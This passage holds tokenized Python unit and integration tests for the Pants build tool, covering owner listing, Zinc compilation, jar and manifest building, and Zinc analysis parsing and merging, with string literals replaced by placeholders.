<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from textwrap import dedent <EOL> from pants . backend . graph_info . tasks . list_owners import ListOwners <EOL> from pants . backend . python . targets . python_library import PythonLibrary <EOL> from pants . base . exceptions import TaskError <EOL> from pants . build_graph . build_file_aliases import BuildFileAliases <EOL> from pants_test . tasks . task_test_base import ConsoleTaskTestBase <EOL> class ListOwnersTest ( ConsoleTaskTestBase ) : <EOL> @ classmethod <EOL> def task_type ( cls ) : <EOL> return ListOwners <EOL> @ property <EOL> def alias_groups ( self ) : <EOL> return BuildFileAliases ( targets = { '<STR_LIT>' : PythonLibrary } ) <EOL> def setUp ( self ) : <EOL> super ( ListOwnersTest , self ) . setUp ( ) <EOL> def add_to_build_file ( path , name , * sources ) : <EOL> all_sources = [ "<STR_LIT>" . format ( source ) for source in list ( sources ) ] <EOL> self . add_to_build_file ( path , dedent ( """<STR_LIT>""" . format ( name = name , all_sources = '<STR_LIT:U+002C>' . join ( all_sources ) ) ) ) <EOL> add_to_build_file ( '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT>' , '<STR_LIT:d>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT>' , '<STR_LIT:e>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT:a>' , '<STR_LIT:c>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> def test_no_targets ( self ) : <EOL> self . assert_console_output ( passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_no_targets_output_format_json ( self ) : <EOL> self . assert_console_output ( dedent ( """<STR_LIT>""" ) . 
lstrip ( '<STR_LIT:\n>' ) , <EOL> passthru_args = [ '<STR_LIT>' ] , <EOL> options = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def test_one_target ( self ) : <EOL> self . assert_console_output ( '<STR_LIT>' , passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_one_target_output_format_json ( self ) : <EOL> self . assert_console_output ( dedent ( """<STR_LIT>""" ) . lstrip ( '<STR_LIT:\n>' ) , <EOL> passthru_args = [ '<STR_LIT>' ] , <EOL> options = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def test_multiple_targets ( self ) : <EOL> self . assert_console_output ( '<STR_LIT>' , '<STR_LIT>' , passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_multiple_targets_output_format_json ( self ) : <EOL> self . assert_console_output ( dedent ( """<STR_LIT>""" ) . lstrip ( '<STR_LIT:\n>' ) , <EOL> passthru_args = [ '<STR_LIT>' ] , <EOL> options = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def test_target_in_parent_directory ( self ) : <EOL> self . assert_console_output ( '<STR_LIT>' , passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_multiple_targets_one_in_parent_directory ( self ) : <EOL> self . assert_console_output ( '<STR_LIT>' , '<STR_LIT>' , passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_target_with_multiple_sources ( self ) : <EOL> self . assert_console_output ( '<STR_LIT>' , passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_no_sources ( self ) : <EOL> self . assert_console_raises ( TaskError , passthru_args = [ ] ) <EOL> def test_too_many_sources_output_format_text ( self ) : <EOL> self . assert_console_raises ( TaskError , passthru_args = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_multiple_sources_output_format_json ( self ) : <EOL> self . assert_console_output ( dedent ( """<STR_LIT>""" ) . lstrip ( '<STR_LIT:\n>' ) , <EOL> passthru_args = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> options = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> from pants . build_graph . address import Address <EOL> from pants . build_graph . target import Target <EOL> from pants_test . backend . jvm . tasks . jvm_compile . base_compile_integration_test import BaseCompileIT <EOL> class ZincCompileIntegrationTest ( BaseCompileIT ) : <EOL> def test_java_src_zinc_compile ( self ) : <EOL> with self . do_test_compile ( '<STR_LIT>' ) : <EOL> pass <EOL> with self . do_test_compile ( '<STR_LIT>' ) : <EOL> pass <EOL> def test_in_process ( self ) : <EOL> with self . temporary_workdir ( ) as workdir : <EOL> with self . temporary_cachedir ( ) as cachedir : <EOL> pants_run = self . run_test_compile ( <EOL> workdir , cachedir , '<STR_LIT>' , <EOL> extra_args = [ '<STR_LIT>' ] , clean_all = True <EOL> ) <EOL> self . assertIn ( '<STR_LIT>' , pants_run . stdout_data ) <EOL> self . assertNotIn ( '<STR_LIT>' , pants_run . stdout_data ) <EOL> def test_log_level ( self ) : <EOL> with self . temporary_workdir ( ) as workdir : <EOL> with self . temporary_cachedir ( ) as cachedir : <EOL> target = '<STR_LIT>' <EOL> pants_run = self . run_test_compile ( <EOL> workdir , cachedir , target , <EOL> extra_args = [ '<STR_LIT>' ] , clean_all = True <EOL> ) <EOL> self . assertIn ( '<STR_LIT>' , pants_run . stdout_data ) <EOL> self . assertIn ( '<STR_LIT>' , pants_run . stdout_data ) <EOL> def test_unicode_source_symbol ( self ) : <EOL> with self . temporary_workdir ( ) as workdir : <EOL> with self . temporary_cachedir ( ) as cachedir : <EOL> target = '<STR_LIT>' <EOL> pants_run = self . run_test_compile ( <EOL> workdir , cachedir , target , <EOL> extra_args = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( cachedir ) , <EOL> ] , <EOL> clean_all = True , <EOL> ) <EOL> self . assert_success ( pants_run ) <EOL> def test_apt_compile ( self ) : <EOL> with self . 
do_test_compile ( '<STR_LIT>' , <EOL> expected_files = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) as found : <EOL> self . assertTrue ( <EOL> self . get_only ( found , '<STR_LIT>' ) . endswith ( <EOL> '<STR_LIT>' ) ) <EOL> processor_service_files = found [ '<STR_LIT>' ] <EOL> self . assertEqual ( <NUM_LIT:1> , len ( processor_service_files ) ) <EOL> processor_service_file = list ( processor_service_files ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( processor_service_file . endswith ( <EOL> '<STR_LIT>' ) ) <EOL> with open ( processor_service_file ) as fp : <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> fp . read ( ) . strip ( ) ) <EOL> def test_apt_compile_and_run ( self ) : <EOL> with self . do_test_compile ( '<STR_LIT>' , <EOL> expected_files = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) as found : <EOL> self . assertTrue ( <EOL> self . get_only ( found , '<STR_LIT>' ) . endswith ( <EOL> '<STR_LIT>' ) ) <EOL> with open ( self . get_only ( found , '<STR_LIT>' ) ) as fp : <EOL> self . assertIn ( '<STR_LIT>' , fp . read ( ) . splitlines ( ) ) <EOL> def test_stale_apt_with_deps ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . do_test_compile ( <EOL> '<STR_LIT>' , <EOL> expected_files = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) as found : <EOL> gen_file = self . get_only ( found , '<STR_LIT>' ) <EOL> self . assertTrue ( gen_file . endswith ( <EOL> '<STR_LIT>' ) , <EOL> msg = '<STR_LIT>' . format ( gen_file ) ) <EOL> with self . temporary_workdir ( ) as workdir : <EOL> with self . temporary_cachedir ( ) as cachedir : <EOL> self . assert_success ( self . run_test_compile ( <EOL> workdir , <EOL> cachedir , <EOL> '<STR_LIT>' ) ) <EOL> self . assert_success ( self . run_test_compile ( <EOL> workdir , <EOL> cachedir , <EOL> '<STR_LIT>' , <EOL> clean_all = False ) ) <EOL> def test_fatal_warning ( self ) : <EOL> def test_combination ( target , default_fatal_warnings , expect_success ) : <EOL> with self . temporary_workdir ( ) as workdir : <EOL> with self . 
temporary_cachedir ( ) as cachedir : <EOL> if default_fatal_warnings : <EOL> arg = '<STR_LIT>' <EOL> else : <EOL> arg = '<STR_LIT>' <EOL> pants_run = self . run_test_compile ( <EOL> workdir , <EOL> cachedir , <EOL> '<STR_LIT>' . format ( target ) , <EOL> extra_args = [ arg , '<STR_LIT>' ] ) <EOL> if expect_success : <EOL> self . assert_success ( pants_run ) <EOL> else : <EOL> self . assert_failure ( pants_run ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = True , expect_success = False ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = False , expect_success = True ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = True , expect_success = False ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = False , expect_success = False ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = True , expect_success = True ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = False , expect_success = True ) <EOL> def test_record_classpath ( self ) : <EOL> target_spec = '<STR_LIT>' <EOL> target_id = Target . compute_target_id ( Address . parse ( target_spec ) ) <EOL> classpath_filename = '<STR_LIT>' . format ( target_id ) <EOL> with self . do_test_compile ( target_spec , <EOL> expected_files = [ classpath_filename , '<STR_LIT>' ] , <EOL> extra_args = [ '<STR_LIT>' ] ) as found : <EOL> found_classpath_file = self . get_only ( found , classpath_filename ) <EOL> self . assertTrue ( found_classpath_file <EOL> . endswith ( os . path . join ( '<STR_LIT>' , classpath_filename ) ) ) <EOL> with open ( found_classpath_file , '<STR_LIT:r>' ) as f : <EOL> self . assertIn ( target_id , f . read ( ) ) <EOL> def test_no_record_classpath ( self ) : <EOL> target_spec = '<STR_LIT>' <EOL> target_id = Target . compute_target_id ( Address . parse ( target_spec ) ) <EOL> classpath_filename = '<STR_LIT>' . format ( target_id ) <EOL> with self . 
do_test_compile ( target_spec , <EOL> expected_files = [ '<STR_LIT>' ] , <EOL> extra_args = [ '<STR_LIT>' ] ) as found : <EOL> self . assertFalse ( classpath_filename in found ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import re <EOL> from contextlib import contextmanager <EOL> from textwrap import dedent <EOL> from six . moves import range <EOL> from twitter . common . collections import maybe_list <EOL> from pants . backend . jvm . targets . java_agent import JavaAgent <EOL> from pants . backend . jvm . targets . jvm_binary import JvmBinary <EOL> from pants . backend . jvm . tasks . jar_task import JarBuilderTask , JarTask <EOL> from pants . build_graph . build_file_aliases import BuildFileAliases <EOL> from pants . util . contextutil import open_zip , temporary_dir , temporary_file <EOL> from pants . util . dirutil import safe_mkdir , safe_mkdtemp , safe_rmtree <EOL> from pants_test . jvm . jar_task_test_base import JarTaskTestBase <EOL> class BaseJarTaskTest ( JarTaskTestBase ) : <EOL> @ property <EOL> def alias_groups ( self ) : <EOL> return super ( BaseJarTaskTest , self ) . alias_groups . merge ( BuildFileAliases ( <EOL> targets = { <EOL> '<STR_LIT>' : JavaAgent , <EOL> '<STR_LIT>' : JvmBinary , <EOL> } , <EOL> ) ) <EOL> def setUp ( self ) : <EOL> super ( BaseJarTaskTest , self ) . setUp ( ) <EOL> self . workdir = safe_mkdtemp ( ) <EOL> self . jar_task = self . prepare_execute ( self . context ( ) ) <EOL> def tearDown ( self ) : <EOL> super ( BaseJarTaskTest , self ) . tearDown ( ) <EOL> if self . workdir : <EOL> safe_rmtree ( self . workdir ) <EOL> @ contextmanager <EOL> def jarfile ( self ) : <EOL> with temporary_file ( root_dir = self . workdir , suffix = '<STR_LIT>' ) as fd : <EOL> fd . close ( ) <EOL> yield fd . name <EOL> def assert_listing ( self , jar , * expected_items ) : <EOL> self . assertEquals ( { '<STR_LIT>' , '<STR_LIT>' } | set ( expected_items ) , <EOL> set ( jar . 
namelist ( ) ) ) <EOL> class JarTaskTest ( BaseJarTaskTest ) : <EOL> MAX_SUBPROC_ARGS = <NUM_LIT:50> <EOL> class TestJarTask ( JarTask ) : <EOL> def execute ( self ) : <EOL> pass <EOL> @ classmethod <EOL> def task_type ( cls ) : <EOL> return cls . TestJarTask <EOL> def setUp ( self ) : <EOL> super ( JarTaskTest , self ) . setUp ( ) <EOL> self . set_options ( max_subprocess_args = self . MAX_SUBPROC_ARGS ) <EOL> self . jar_task = self . prepare_execute ( self . context ( ) ) <EOL> def test_update_write ( self ) : <EOL> with temporary_dir ( ) as chroot : <EOL> _path = os . path . join ( chroot , '<STR_LIT>' ) <EOL> safe_mkdir ( _path ) <EOL> data_file = os . path . join ( _path , '<STR_LIT>' ) <EOL> with open ( data_file , '<STR_LIT:w>' ) as fd : <EOL> fd . write ( '<STR_LIT:e>' ) <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile ) as jar : <EOL> jar . write ( data_file , '<STR_LIT>' ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT:e>' , jar . read ( '<STR_LIT>' ) ) <EOL> def test_update_writestr ( self ) : <EOL> def assert_writestr ( path , contents , * entries ) : <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile ) as jar : <EOL> jar . writestr ( path , contents ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , * entries ) <EOL> self . assertEquals ( contents , jar . read ( path ) ) <EOL> assert_writestr ( '<STR_LIT>' , b'<STR_LIT:b>' , '<STR_LIT>' ) <EOL> assert_writestr ( '<STR_LIT>' , b'<STR_LIT:d>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_overwrite_write ( self ) : <EOL> with temporary_dir ( ) as chroot : <EOL> _path = os . path . join ( chroot , '<STR_LIT>' ) <EOL> safe_mkdir ( _path ) <EOL> data_file = os . path . 
join ( _path , '<STR_LIT>' ) <EOL> with open ( data_file , '<STR_LIT:w>' ) as fd : <EOL> fd . write ( '<STR_LIT:e>' ) <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile , overwrite = True ) as jar : <EOL> jar . write ( data_file , '<STR_LIT>' ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT:e>' , jar . read ( '<STR_LIT>' ) ) <EOL> def test_overwrite_writestr ( self ) : <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile , overwrite = True ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT>' ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , jar . read ( '<STR_LIT>' ) ) <EOL> def test_custom_manifest ( self ) : <EOL> contents = b'<STR_LIT>' <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile , overwrite = True ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT>' ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , jar . read ( '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( contents , jar . read ( '<STR_LIT>' ) ) <EOL> with self . jar_task . open_jar ( existing_jarfile , overwrite = False ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , contents ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , jar . read ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( contents , jar . read ( '<STR_LIT>' ) ) <EOL> def test_classpath ( self ) : <EOL> def manifest_content ( classpath ) : <EOL> return ( b'<STR_LIT>' + <EOL> b'<STR_LIT>' + <EOL> b'<STR_LIT>' ) . format ( <EOL> '<STR_LIT:U+0020>' . 
join ( maybe_list ( classpath ) ) ) <EOL> def assert_classpath ( classpath ) : <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile ) as jar : <EOL> jar . append_classpath ( os . path . join ( self . workdir , '<STR_LIT>' ) ) <EOL> with self . jar_task . open_jar ( existing_jarfile ) as jar : <EOL> jar . append_classpath ( [ os . path . join ( self . workdir , jar_path ) for jar_path in classpath ] ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assertEqual ( manifest_content ( classpath ) , jar . read ( '<STR_LIT>' ) ) <EOL> assert_classpath ( [ '<STR_LIT>' ] ) <EOL> assert_classpath ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_update_jars ( self ) : <EOL> with self . jarfile ( ) as main_jar : <EOL> with self . jarfile ( ) as included_jar : <EOL> with self . jar_task . open_jar ( main_jar ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT:c>' ) <EOL> with self . jar_task . open_jar ( included_jar ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT:g>' ) <EOL> with self . jar_task . open_jar ( main_jar ) as jar : <EOL> jar . writejar ( included_jar ) <EOL> with open_zip ( main_jar ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_overwrite_jars ( self ) : <EOL> with self . jarfile ( ) as main_jar : <EOL> with self . jarfile ( ) as included_jar : <EOL> with self . jar_task . open_jar ( main_jar ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT:c>' ) <EOL> with self . jar_task . open_jar ( included_jar ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT:g>' ) <EOL> with self . jar_task . open_jar ( main_jar , overwrite = True ) as jar : <EOL> for i in range ( self . MAX_SUBPROC_ARGS + <NUM_LIT:1> ) : <EOL> jar . writejar ( included_jar ) <EOL> with open_zip ( main_jar ) as jar : <EOL> self . 
assert_listing ( jar , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class JarBuilderTest ( BaseJarTaskTest ) : <EOL> class TestJarBuilderTask ( JarBuilderTask ) : <EOL> def execute ( self ) : <EOL> pass <EOL> @ classmethod <EOL> def task_type ( cls ) : <EOL> return cls . TestJarBuilderTask <EOL> def setUp ( self ) : <EOL> super ( JarBuilderTest , self ) . setUp ( ) <EOL> self . set_options ( max_subprocess_args = <NUM_LIT:100> ) <EOL> def test_agent_manifest ( self ) : <EOL> self . add_to_build_file ( '<STR_LIT>' , dedent ( """<STR_LIT>""" ) . strip ( ) ) <EOL> java_agent = self . target ( '<STR_LIT>' ) <EOL> context = self . context ( target_roots = [ java_agent ] ) <EOL> jar_builder_task = self . prepare_execute ( context ) <EOL> self . add_to_runtime_classpath ( context , java_agent , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with jar_builder_task . open_jar ( existing_jarfile ) as jar : <EOL> with jar_builder_task . create_jar_builder ( jar ) as jar_builder : <EOL> jar_builder . add_target ( java_agent ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , jar . read ( '<STR_LIT>' ) ) <EOL> manifest = jar . read ( '<STR_LIT>' ) . strip ( ) <EOL> all_entries = dict ( tuple ( re . split ( r'<STR_LIT>' , line , <NUM_LIT:1> ) ) for line in manifest . splitlines ( ) ) <EOL> expected_entries = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> } <EOL> self . assertEquals ( set ( expected_entries . items ( ) ) , <EOL> set ( expected_entries . items ( ) ) . intersection ( set ( all_entries . items ( ) ) ) ) <EOL> def test_manifest_items ( self ) : <EOL> self . add_to_build_file ( '<STR_LIT>' , dedent ( """<STR_LIT>""" ) . strip ( ) ) <EOL> binary_target = self . target ( '<STR_LIT>' ) <EOL> context = self . 
context ( target_roots = [ binary_target ] ) <EOL> self . add_to_runtime_classpath ( context , binary_target , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> jar_builder_task = self . prepare_execute ( context ) <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with jar_builder_task . open_jar ( existing_jarfile ) as jar : <EOL> with jar_builder_task . create_jar_builder ( jar ) as jar_builder : <EOL> jar_builder . add_target ( binary_target ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> manifest = jar . read ( '<STR_LIT>' ) . strip ( ) <EOL> all_entries = dict ( tuple ( re . split ( r'<STR_LIT>' , line , <NUM_LIT:1> ) ) for line in manifest . splitlines ( ) ) <EOL> expected_entries = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . assertEquals ( set ( expected_entries . items ( ) ) , <EOL> set ( expected_entries . items ( ) ) . intersection ( set ( all_entries . items ( ) ) ) ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import shutil <EOL> import StringIO <EOL> import unittest <EOL> import zipfile <EOL> from contextlib import contextmanager <EOL> import six <EOL> from pants . backend . jvm . zinc . zinc_analysis import ZincAnalysis <EOL> from pants . backend . jvm . zinc . zinc_analysis_element import ZincAnalysisElement <EOL> from pants . backend . jvm . zinc . zinc_analysis_parser import ZincAnalysisParser <EOL> from pants . util . contextutil import Timer , environment_as , temporary_dir <EOL> _TEST_DATA_SOURCE_ENV_VAR = '<STR_LIT>' <EOL> @ contextmanager <EOL> def _temp_test_dir ( zipfile_name ) : <EOL> """<STR_LIT>""" <EOL> zipfile_path = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' , zipfile_name ) <EOL> with temporary_dir ( ) as tmpdir : <EOL> zf = zipfile . ZipFile ( zipfile_path , '<STR_LIT:r>' ) <EOL> zf . extractall ( tmpdir ) <EOL> yield tmpdir <EOL> class ZincAnalysisTestBase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . maxDiff = None <EOL> self . total_time = <NUM_LIT:0> <EOL> def _time ( self , work , msg ) : <EOL> with Timer ( ) as timer : <EOL> ret = work ( ) <EOL> elapsed = timer . elapsed <EOL> print ( '<STR_LIT>' % ( msg , elapsed ) ) <EOL> self . total_time += elapsed <EOL> return ret <EOL> class ZincAnalysisTestSimple ( ZincAnalysisTestBase ) : <EOL> def test_simple ( self ) : <EOL> with environment_as ( ZINCUTILS_SORTED_ANALYSIS = '<STR_LIT:1>' ) : <EOL> def get_test_analysis_path ( name ) : <EOL> return os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' , '<STR_LIT>' , name ) <EOL> def get_analysis_text ( name ) : <EOL> with open ( get_test_analysis_path ( name ) , '<STR_LIT:r>' ) as fp : <EOL> return fp . read ( ) <EOL> def parse_analyis ( name ) : <EOL> return ZincAnalysisParser ( ) . 
parse_from_path ( get_test_analysis_path ( name ) ) <EOL> def analysis_to_string ( analysis ) : <EOL> buf = StringIO . StringIO ( ) <EOL> analysis . write ( buf ) <EOL> return buf . getvalue ( ) <EOL> full_analysis = parse_analyis ( '<STR_LIT>' ) <EOL> analysis_splits = full_analysis . split ( [ <EOL> [ b'<STR_LIT>' ] , <EOL> [ b'<STR_LIT>' ] , <EOL> ] ) <EOL> self . assertEquals ( len ( analysis_splits ) , <NUM_LIT:2> ) <EOL> def compare_split ( i ) : <EOL> expected_filename = '<STR_LIT>' . format ( i ) <EOL> expected_analyis = parse_analyis ( expected_filename ) <EOL> self . assertTrue ( expected_analyis . is_equal_to ( analysis_splits [ i ] ) ) <EOL> expected = get_analysis_text ( expected_filename ) <EOL> actual = analysis_to_string ( analysis_splits [ i ] ) <EOL> self . assertMultiLineEqual ( expected , actual ) <EOL> compare_split ( <NUM_LIT:0> ) <EOL> compare_split ( <NUM_LIT:1> ) <EOL> merged_analysis = ZincAnalysis . merge ( analysis_splits ) <EOL> self . assertTrue ( full_analysis . is_equal_to ( merged_analysis ) ) <EOL> expected = get_analysis_text ( '<STR_LIT>' ) <EOL> actual = analysis_to_string ( merged_analysis ) <EOL> self . assertMultiLineEqual ( expected , actual ) <EOL> orig = iter ( get_analysis_text ( '<STR_LIT>' ) . splitlines ( True ) ) <EOL> expected_rebased = get_analysis_text ( '<STR_LIT>' ) <EOL> buf = StringIO . StringIO ( ) <EOL> ZincAnalysisParser ( ) . rebase ( orig , buf , b'<STR_LIT>' , b'<STR_LIT>' ) <EOL> rebased = buf . getvalue ( ) <EOL> self . assertMultiLineEqual ( expected_rebased , rebased ) <EOL> orig = iter ( get_analysis_text ( '<STR_LIT>' ) . splitlines ( True ) ) <EOL> expected_filtered_rebased = get_analysis_text ( '<STR_LIT>' ) <EOL> buf = StringIO . StringIO ( ) <EOL> ZincAnalysisParser ( ) . rebase ( orig , buf , b'<STR_LIT>' , b'<STR_LIT>' , <EOL> b'<STR_LIT>' ) <EOL> filtered_rebased = buf . getvalue ( ) <EOL> self . 
assertMultiLineEqual ( expected_filtered_rebased , filtered_rebased ) <EOL> infile = iter ( get_analysis_text ( '<STR_LIT>' ) . splitlines ( True ) ) <EOL> deps = ZincAnalysisParser ( ) . parse_deps ( infile , '<STR_LIT>' ) <EOL> f = '<STR_LIT>' <EOL> self . assertItemsEqual ( deps [ f ] , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> class ZincAnalysisTestComplex ( ZincAnalysisTestBase ) : <EOL> def test_complex ( self ) : <EOL> with environment_as ( ZINCUTILS_SORTED_ANALYSIS = '<STR_LIT:1>' ) : <EOL> if os . environ . get ( _TEST_DATA_SOURCE_ENV_VAR ) : <EOL> print ( '<STR_LIT>' . format ( <EOL> _TEST_DATA_SOURCE_ENV_VAR ) ) <EOL> self . _generate_testworthy_splits ( ) <EOL> return <EOL> parser = ZincAnalysisParser ( ) <EOL> with _temp_test_dir ( '<STR_LIT>' ) as testdir : <EOL> analysis_files = [ os . path . join ( testdir , f ) <EOL> for f in os . listdir ( testdir ) <EOL> if f . endswith ( b'<STR_LIT>' ) and not f . endswith ( b'<STR_LIT>' ) ] <EOL> num_analyses = len ( analysis_files ) <EOL> def parse ( f ) : <EOL> return parser . parse_from_path ( f ) <EOL> analyses = self . _time ( lambda : [ parse ( f ) for f in analysis_files ] , <EOL> '<STR_LIT>' % num_analyses ) <EOL> writeout_dir = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> os . mkdir ( writeout_dir ) <EOL> def write ( file_name , analysis ) : <EOL> outpath = os . path . join ( writeout_dir , file_name ) <EOL> analysis . write_to_path ( outpath ) <EOL> def _write_all ( ) : <EOL> for analysis_file , analysis in zip ( analysis_files , analyses ) : <EOL> write ( os . path . basename ( analysis_file ) , analysis ) <EOL> self . _time ( _write_all , '<STR_LIT>' % num_analyses ) <EOL> merged_analysis = self . _time ( lambda : ZincAnalysis . merge ( analyses ) , <EOL> '<STR_LIT>' % num_analyses ) <EOL> merged_analysis_path = os . path . join ( writeout_dir , b'<STR_LIT>' ) <EOL> self . _time ( lambda : merged_analysis . 
write_to_path ( merged_analysis_path ) , <EOL> '<STR_LIT>' % merged_analysis_path ) <EOL> merged_analysis2 = self . _time ( lambda : parser . parse_from_path ( merged_analysis_path ) , <EOL> '<STR_LIT>' % merged_analysis_path ) <EOL> expected_merged_analysis_path = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> expected_merged_analysis = self . _time ( <EOL> lambda : parser . parse_from_path ( expected_merged_analysis_path ) , <EOL> '<STR_LIT>' % expected_merged_analysis_path ) <EOL> diffs = merged_analysis . diff ( merged_analysis2 ) <EOL> self . assertTrue ( merged_analysis . is_equal_to ( merged_analysis2 ) , '<STR_LIT>' . join ( <EOL> [ six . u ( diff ) for diff in diffs ] ) ) <EOL> diffs = expected_merged_analysis . diff ( merged_analysis2 ) <EOL> self . assertTrue ( expected_merged_analysis . is_equal_to ( merged_analysis2 ) , '<STR_LIT>' . join ( <EOL> [ six . u ( diff ) for diff in diffs ] ) ) <EOL> sources_per_analysis = [ a . stamps . sources . keys ( ) for a in analyses ] <EOL> split_analyses = self . _time ( lambda : merged_analysis2 . split ( <EOL> sources_per_analysis , catchall = True ) , <EOL> '<STR_LIT>' % num_analyses ) <EOL> self . assertEquals ( num_analyses + <NUM_LIT:1> , len ( split_analyses ) ) <EOL> catchall_analysis = split_analyses [ - <NUM_LIT:1> ] <EOL> self . assertEquals ( <NUM_LIT:0> , len ( catchall_analysis . stamps . sources ) ) <EOL> splits_dir = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> os . mkdir ( splits_dir ) <EOL> for analysis_file , analysis , split_analysis in zip ( analysis_files , analyses , split_analyses ) : <EOL> outfile_path = os . path . join ( splits_dir , os . path . basename ( analysis_file ) ) <EOL> split_analysis . write_to_path ( outfile_path ) <EOL> diffs = analysis . diff ( split_analysis ) <EOL> self . assertTrue ( analysis . is_equal_to ( split_analysis ) , <EOL> '<STR_LIT>' . join ( [ six . u ( diff ) for diff in diffs ] ) ) <EOL> print ( '<STR_LIT>' % self . 
